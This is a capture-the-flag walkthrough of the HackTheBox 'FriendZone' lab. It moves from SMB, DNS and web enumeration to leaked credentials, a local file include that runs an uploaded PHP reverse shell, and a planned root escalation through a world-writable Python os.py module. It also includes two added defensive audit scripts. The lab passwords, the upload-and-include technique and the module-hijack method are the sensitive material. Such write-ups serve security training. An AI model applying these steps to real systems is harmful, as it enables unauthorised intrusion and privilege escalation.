┌──(kali💀kali)-[~/Desktop]
└─$ nmap --script smb-enum-shares.nse -p445 10.10.10.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 01:24 EST
Nmap scan report for friendzoneportal.red (10.10.10.123)
Host is up (0.47s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
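As an added example (not part of the original writeup), here is a small Python parser for the smb-enum-shares output format above that flags disk shares a null session can write to, which is the misconfiguration the rest of this walkthrough relies on. SAMPLE is a constructed excerpt in that format, not real scan data.

```python
import re

# Constructed excerpt in the nmap smb-enum-shares output format (not real scan data).
SAMPLE = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.123\Development:
|     Type: STYPE_DISKTREE
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files:
|     Type: STYPE_DISKTREE
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
"""

# "|   \\host\share:" opens a share block; "|_" marks the last line of the script output.
SHARE_RE = re.compile(r"^\|_?\s+\\\\[^\\]+\\(\S+):\s*$")
# "|     Field name: value" inside a share block.
FIELD_RE = re.compile(r"^\|_?\s+([A-Za-z ]+):\s*(.+?)\s*$")


def parse_shares(text):
    """Return {share_name: {field: value}} from smb-enum-shares script output."""
    shares, current = {}, None
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if m:
            current = m.group(1)
            shares[current] = {}
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            shares[current][m.group(1)] = m.group(2)
    return shares


def anonymous_writable(text):
    """Disk shares a null session can write to; IPC$ is skipped because it is not a file share."""
    return sorted(
        name for name, fields in parse_shares(text).items()
        if fields.get("Type") == "STYPE_DISKTREE" and "WRITE" in fields.get("Anonymous access", "")
    )


if __name__ == "__main__":
    for share in anonymous_writable(SAMPLE):
        print("anonymous write access:", share)
```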
Enumeration: HTTP Port 80/tcp
I always start off with enumerating HTTP first. In this case both 80 and 443 are open so we’ll start there. We can see the email is info@friendzoneportal.red. The friendzoneportal.red could be a possible domain name. We’ll keep it in mind when enumerating DNS.
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.123/
- Nikto v2.5.0
+ Target IP: 10.10.10.123
+ Target Hostname: 10.10.10.123
+ Target Port: 80
+ Start Time: 2024-01-07 22:11:15 (GMT-5)
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 144, size: 577831e9005e6, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wordpress/: Directory indexing found.
+ 8048 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2024-01-07 23:13:07 (GMT-5) (3712 seconds)
Enumeration: HTTPS Port 443/tcp
Visiting the site over HTTPS (port 443) gives us an error.
https://10.10.10.123/
Not Found
The requested URL / was not found on this server.
Apache/2.4.29 (Ubuntu) Server at 10.10.10.123 Port 443
/admin is an empty dir just like /wordpress was on http:
/js has something in it:
Going to https://friendzone.red/js/js/ gives a page:
https://friendzone.red/js/js/
Testing some functions !
I'am trying not to break things !
Z2pPVHFINUs4cTE3MDQ2OTUyMzNtejFyWVlBNUhT
The source reveals it also has some comments:
<p>Testing some functions !</p><p>I'am trying not to break things !</p>
S0s4ZGFJdjFibDE1NDk5MjIwMDJIbWt2TmtKZThr<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->
This doesn’t have much meaning to me yet. Might be an allusion to DNS zones. Or it might just be a troll.
Enumeration: ISC BIND 9.11.3-1ubuntu1.2 Port 53/tcp (DNS)
Try to get a domain name for the IP address using nslookup.
We don’t get anything. However, we do have two possible domains from previous enumeration steps:
friendzone.red from the nmap scan, and
friendzoneportal.red from the HTTP website
Let’s try a zone transfer on both domains.
zone transfer command: host -l <domain> <dns-server-address>
┌──(kali💀kali)-[~]
└─$ host -l friendzoneportal.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzoneportal.red has IPv6 address ::1
friendzoneportal.red name server localhost.
friendzoneportal.red has address 127.0.0.1
admin.friendzoneportal.red has address 127.0.0.1
files.friendzoneportal.red has address 127.0.0.1
imports.friendzoneportal.red has address 127.0.0.1
vpn.friendzoneportal.red has address 127.0.0.1
┌──(kali💀kali)-[~]
└─$ host -l friendzone.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1
Add all the domains/subdomains to the /etc/hosts file.
Now we start visiting the subdomains we found. Remember that we have to visit them over both HTTP and HTTPS because we’re likely to get different results.
The following sites showed us particularly interesting results.
I tried default credentials on the admin sites but that didn’t work. Before we run a password cracker on those two sites, let’s enumerate SMB. We might find credentials there.
Enumeration: Ports 139/tcp and 445/tcp: Samba smbd 4.7.6-Ubuntu
Run smbmap to list available shares and permissions.
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123
[+] IP: 10.10.10.123:445 Name: friendzoneportal.red Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
We have READ access on the general share and READ/WRITE access on the Development share. List the content of the shares.
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123 -r
[+] IP: 10.10.10.123:445 Name: friendzoneportal.red Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
./general
dr--r--r-- 0 Wed Jan 16 15:10:51 2019 .
dr--r--r-- 0 Tue Sep 13 10:56:24 2022 ..
fr--r--r-- 57 Tue Oct 9 19:52:42 2018 creds.txt
Development READ, WRITE FriendZone Samba Server Files
./Development
dr--r--r-- 0 Mon Jan 8 00:58:36 2024 .
dr--r--r-- 0 Tue Sep 13 10:56:24 2022 ..
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
-r: list directories and files on all accessible shares
The Development share does not contain anything, but the general directory has a file named creds.txt! Before we download the file, let’s use smbclient to view more information about the shares.
┌──(kali💀kali)-[~]
└─$ smbclient -L //10.10.10.123
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP FRIENDZONE
-L: look at what services are available on a server
The extra information this gives us over smbmap is the Comment column. We can see that the files in the Files share are stored in /etc/Files on the system. Therefore, there’s a good possibility that the files stored in the Development share (which we have WRITE access to) are stored in /etc/Development. We might need this piece of information in the exploitation phase.
Let’s get the creds.txt file. First, login anonymously (without a password) into the general share.
┌──(kali💀kali)-[~]
└─$ smbclient //10.10.10.123/general -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 16 15:10:51 2019
.. D 0 Tue Sep 13 10:56:24 2022
creds.txt N 57 Tue Oct 9 19:52:42 2018
-N: suppresses the normal password prompt from the client to the user
Download the creds.txt file from the target machine to the attack machine.
smb: \> get creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
https://admin.friendzoneportal.red/
https://admin.friendzoneportal.red/login.php
Admin page is not developed yet !!! check for another one
Also doesn’t work. Next, try the credentials on https://administrator1.friendzone.red/
We’re in! Visit the /dashboard.php page.
https://administrator1.friendzone.red/dashboard.php
Smart photo script for friendzone corp !
* Note : we are dealing with a beginner php developer and the application is not tested yet !
image_name param is missed !
please enter it to show the image
default is image_id=a.jpg&pagename=timestamp
It seems to be a page that allows you to view images on the site. We’ll try to gain initial access through this page.
The dashboard.php page tells us how to view an image: append the image_id and pagename parameters from the default example shown above to the URL.
During our enumeration phase, we found a URL, that allows us to upload images. Let’s try and see if the images we upload there can be viewed through the dashboard page.
┌──(kali💀kali)-[~]
└─$ ssh admin@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
admin@10.10.10.123's password:
Permission denied, please try again.
Also doesn’t work.
Shell as www-data
LFI
Based on the recon above, there’s a likely local file include (LFI) in this page. Both parameters have potential.
Nope, it doesn’t find the image. Let’s move our focus to the pagename parameter. It seems to be running a timestamp script that generates a timestamp and outputs it on the page. Based on the way the application is currently working, my gut feeling is that it takes the filename “timestamp” and appends “.php” to it and then runs that script. Therefore, if this is vulnerable to LFI, it would be difficult to disclose sensitive files since the “.php” extension will get added to my query.
Instead, let’s try first uploading a php file and then exploiting the LFI vulnerability to output something on the page. During the enumeration phase, we found that we have READ and WRITE permissions on the Development share and that it’s likely that the files uploaded on that share are stored in the location /etc/Development (based on the Comments column).
┌──(kali💀kali)-[~/Desktop]
└─$ curl -k https://administrator1.friendzone.red/timestamp.php
Final Access timestamp is 1704699293
Let’s create a simple test.php script that outputs the string “It’s working!” on the page.
<?php
echo "It's working!";
?>
Log into the Development share.
┌──(kali💀kali)-[~/Desktop]
└─$ smbclient //10.10.10.123/Development -N
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (3.3 kb/s) (average 3.3 kb/s)
This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (CTRL+ Z) and run the following in your terminal which tells your terminal to pass keyboard shortcuts to the shell.
In the /var/www/ directory, there are folders for all the different sites, as well as a MySQL conf file:
www-data@FriendZone:/etc/Development$ cd /var/www/
www-data@FriendZone:/var/www$ ls
ls
admin friendzoneportal html uploads
friendzone friendzoneportaladmin mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
Those creds happen to work for friend. I can either su friend:
SU:
www-data@FriendZone:/var/www$ su friend
su friend
Password: Agpyu12!0.213$
friend@FriendZone:/var/www$ whoami
friend
friend@FriendZone:/var/www$ id
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
SSH:
or ssh in with them:
┌──(kali💀kali)-[~]
└─$ ssh friend@10.10.10.123
friend@10.10.10.123's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$
friend@FriendZone:~$ ls
user.txt
friend@FriendZone:~$ cat user.txt
69559-----------------------------
We have rwx privileges on the /etc/Development directory as www-data. So let’s upload the LinEnum script in the Development share.
┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$ smbclient //10.10.10.123/Development -N
Try "help" to get a list of possible commands.
smb: \> put LinEnum.sh
Give the script execute permissions.
chmod +x LinEnum.sh
I don’t seem to have execute permissions in that directory, so I’ll copy it to the tmp directory.
Navigate to the /tmp directory and try again.
cd /tmp/
chmod +x LinEnum.sh
That works, so the next step is to execute the script.
./LinEnum.sh
The results from LinEnum don’t give us anything that we could use to escalate privileges. So let’s try pspy. If you don’t have the script, you can download it from the following github repository.
Upload it and run it on the target machine in the same way we did for LinEnum.
Priv: friend to root
It seems that the reporter.py script is getting executed every couple of minutes as a scheduled task. Let’s view the permissions we have on that file.
We only have read permission. So let’s view the content of the file.
friend@FriendZone:~$ cat /opt/server_admin/reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
Here’s the source code of the script. Most of the script is commented out, so there isn’t much to do there. It does import the os module, though. Maybe we can hijack that. Locate the module on the machine.
Navigate to the directory and view the permissions on the file
friend@FriendZone:~$ cd /usr/lib/python2.7
friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 os.py
-rw-rw-r-- 1 friend friend 25583 Jan 15 2019 os.pyc
We have rwx privileges on the os.py module! This is obviously a security misconfiguration. As a non-privileged user, I should only have read access to the script. If we add a reverse shell to the script and wait for the root owned scheduled task to run, we’ll get back a reverse shell with root privileges!
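To audit for this misconfiguration from the defender's side, here is an added Python 3 script (not from the writeup) that lists the modules a scheduled script imports and reports any whose source file is group- or world-writable, using a constructed temp-directory fixture that mirrors the writable os.py and the reporter.py found here. resolve_module is a simplified lookup of name.py or name/__init__.py along a given search path, not the interpreter's full import machinery.

```python
import os
import re
import stat
import tempfile

# Matches "import a, b" and "from a import b"; works on Python 2 sources like reporter.py too.
IMPORT_RE = re.compile(r"^\s*(?:import|from)\s+([\w.]+(?:\s*,\s*[\w.]+)*)")

def imported_modules(script_path):
    """Top-level module names a script imports, e.g. ['os'] for reporter.py above."""
    names = set()
    with open(script_path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            m = IMPORT_RE.match(line)
            if m:
                names.update(p.strip().split(".")[0] for p in m.group(1).split(","))
    return sorted(names)

def writable_by_non_owner(path):
    """True when the group or world write bit is set (the -rwxrwxrwx os.py case)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def resolve_module(name, search_path):
    """Simplified import lookup: first name.py or name/__init__.py along search_path."""
    for d in search_path:
        for candidate in (os.path.join(d, name + ".py"), os.path.join(d, name, "__init__.py")):
            if os.path.isfile(candidate):
                return candidate
    return None

def hijackable_imports(script_path, search_path):
    """[(module, file)] for imports whose source a non-owner could edit; script dir is searched first, like sys.path[0]."""
    dirs = [os.path.dirname(os.path.abspath(script_path))] + list(search_path)
    resolved = ((n, resolve_module(n, dirs)) for n in imported_modules(script_path))
    return [(n, f) for n, f in resolved if f is not None and writable_by_non_owner(f)]

def demo():
    """Constructed fixture: a lib dir with a world-writable os.py and a script like reporter.py."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "python2.7")
    os.mkdir(lib)
    for filename, mode in (("os.py", 0o777), ("string.py", 0o644)):
        path = os.path.join(lib, filename)
        open(path, "w").close()
        os.chmod(path, mode)
    script = os.path.join(root, "reporter.py")
    with open(script, "w") as fh:
        fh.write('#!/usr/bin/python\nimport os, string\nprint "[+] Trying to send email"\n')
    return [name for name, _ in hijackable_imports(script, [lib])]
```

Running demo() reports only os, since string.py in the fixture is owner-writable only.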
I tried accessing the os.py script using vi but the terminal was a bit screwed up. Here’s a way to fix it (courtesy of ippsec). Go to a new pane in the attack machine and enter the following command.
Even after this, vi was still a bit glitchy, so instead, I decided to download the os.py module to my attack machine using SMB, add the reverse shell there and upload it back to the target machine. Add the following reverse shell code to the bottom of the os.py file and upload it back to the target machine.